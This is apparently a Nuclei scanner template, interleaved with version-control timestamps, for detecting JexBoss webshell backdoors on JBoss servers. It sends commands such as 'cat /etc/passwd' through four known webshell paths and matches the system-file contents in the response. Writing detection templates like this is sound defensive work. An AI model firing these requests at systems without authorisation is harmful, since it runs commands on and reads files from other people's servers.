2021-12-04 10:09:18 +00:00
id : jexboss-backdoor
info :
2022-10-10 19:22:59 +00:00
name : JexBoss - Remote Code Execution
2021-12-04 10:09:18 +00:00
author : UnkL4b
severity : critical
2022-10-10 19:22:59 +00:00
description : JexBoss is susceptible to remote code execution via the webshell. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2021-12-04 10:09:18 +00:00
reference :
- https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A
- https://github.com/joaomatosf/jexboss
2022-07-26 06:59:48 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 8
2021-12-21 15:31:11 +00:00
tags : backdoor,jboss,rce
2021-12-04 10:09:18 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-04 10:09:18 +00:00
- method : GET
path :
2022-07-26 13:45:11 +00:00
- "{{BaseURL}}/jexws/jexws.jsp?ppp={{url_encode('{{command}}')}}"
- "{{BaseURL}}/jexws4/jexws4.jsp?ppp={{url_encode('{{command}}')}}"
- "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp={{url_encode('{{command}}')}}"
- "{{BaseURL}}/jbossass/jbossass.jsp?ppp={{url_encode('{{command}}')}}"
2021-12-21 15:27:06 +00:00
payloads :
command :
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
2021-12-04 10:09:18 +00:00
stop-at-first-match : true
2023-10-14 11:27:55 +00:00
2021-12-04 10:09:18 +00:00
matchers-condition : and
matchers :
2021-12-21 15:27:06 +00:00
- type : regex
2021-12-04 10:09:18 +00:00
part : body
2021-12-21 15:27:06 +00:00
regex :
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition : or
2021-12-04 10:09:18 +00:00
- type : word
part : header
words :
2021-12-21 15:27:06 +00:00
- "X-Powered-By: Servlet"
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022100d2336ea2fd346b1f2e08c4dbca97a022783601dfded794a79091f275f915ce88022068d9ac62ce57574400aaf2aeb507463e4868c437055466d594b31a5b49b81d51:922c64590222798bb761d5b6d8e72950
